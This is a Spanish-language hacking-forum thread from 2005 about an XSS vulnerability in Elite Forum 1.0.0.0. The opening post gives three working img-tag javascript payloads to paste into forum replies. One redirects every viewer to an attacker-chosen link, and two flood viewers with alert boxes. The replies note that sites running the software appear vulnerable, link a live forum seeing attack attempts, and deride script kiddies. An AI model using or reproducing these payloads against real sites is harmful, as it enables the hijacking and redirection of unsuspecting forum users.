elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 10:42  


Tema destacado: Últimos eventos sobre seguridad/inseguridad

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Elite Forum 1.0.0.0 XSS Vulnerability		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Elite Forum 1.0.0.0 XSS Vulnerability  (Leído 719 veces)
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Elite Forum 1.0.0.0 XSS Vulnerability
« en: 2 Noviembre 2005, 01:02 »
El sistema es vulnerable a los ataques XSS.

POC:

Buscamos un foro vulnerable, ingresamos en cualquier topic y contestamos cualquier post.
En la caja de contestacion podemos poner cualquiera de los siguientes codigos:

Código:
<img src="javascript:void(window.location=('imagelink'))">remplazamos ¨imagelink¨por el link de la imagen que va a redireccionar a los user que vean la misma

Código:
<img src="javascript:a=100;while(a>=0){alert(a);a--}">

Código:
<img src="javascript:a=1;while(a>0){alert("sup?")">

Fuente:securityfocus

Salu2
En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
whaky

Desconectado Desconectado

Mensajes: 151


Angel del Infierno


Ver Perfil
Re: Elite Forum 1.0.0.0 XSS Vulnerability
« Respuesta #1 en: 3 Noviembre 2005, 20:22 »
estuve mirando algun foro de ese tipo y de momento to2 son vulnerables....

Gracias por la info.
En línea
Los muertos hablan y las paredes oyen
por si acaso nunca reveles tu identidad.
SeniorX


Desconectado Desconectado

Mensajes: 1.347


Programador Novato


Ver Perfil WWW
Re: Elite Forum 1.0.0.0 XSS Vulnerability
« Respuesta #2 en: 3 Noviembre 2005, 20:27 »
dense una vuelta por este foro, miren la cantidad de intentos de ataques...
http://www.hypermetrics.org/eliteforum/index.php
En línea
Código:
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}
Precaución: La programacion puede producir adiccion
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Elite Forum 1.0.0.0 XSS Vulnerability
« Respuesta #3 en: 3 Noviembre 2005, 20:35 »
no me extraña...apenas se descubre un bug, especialmente de foros, que son los mas facil de explotar, se producen estos ataques...sobre todo de personas que creen que con solo poner en google ¨powered by xxx¨ y entrar en los resultados son ¨hackers¨...pero bueno hay de todo bajo el sol... ;)

Salu2
En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
SeniorX


Desconectado Desconectado

Mensajes: 1.347


Programador Novato


Ver Perfil WWW
Re: Elite Forum 1.0.0.0 XSS Vulnerability
« Respuesta #4 en: 3 Noviembre 2005, 20:49 »
lo mas patetico es que ponen "H4cK3D by" y se creen grandes personas, yo los asociaria a este concepto:
http://es.wikipedia.org/wiki/Script_kiddie de pasada te recomiendo esta pagina que tiene mucha informacion en varios idiomas, no solo de informática.... una pagina muy completa.
http://es.wikipedia.org en el buscador te define el concepto que sea :P
En línea
Código:
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}
Precaución: La programacion puede producir adiccion
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Tropa de élite 2
Foro Libre 		dimitrix 5 2,093 Último mensaje 6 Enero 2011, 21:40
por dimitrix
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines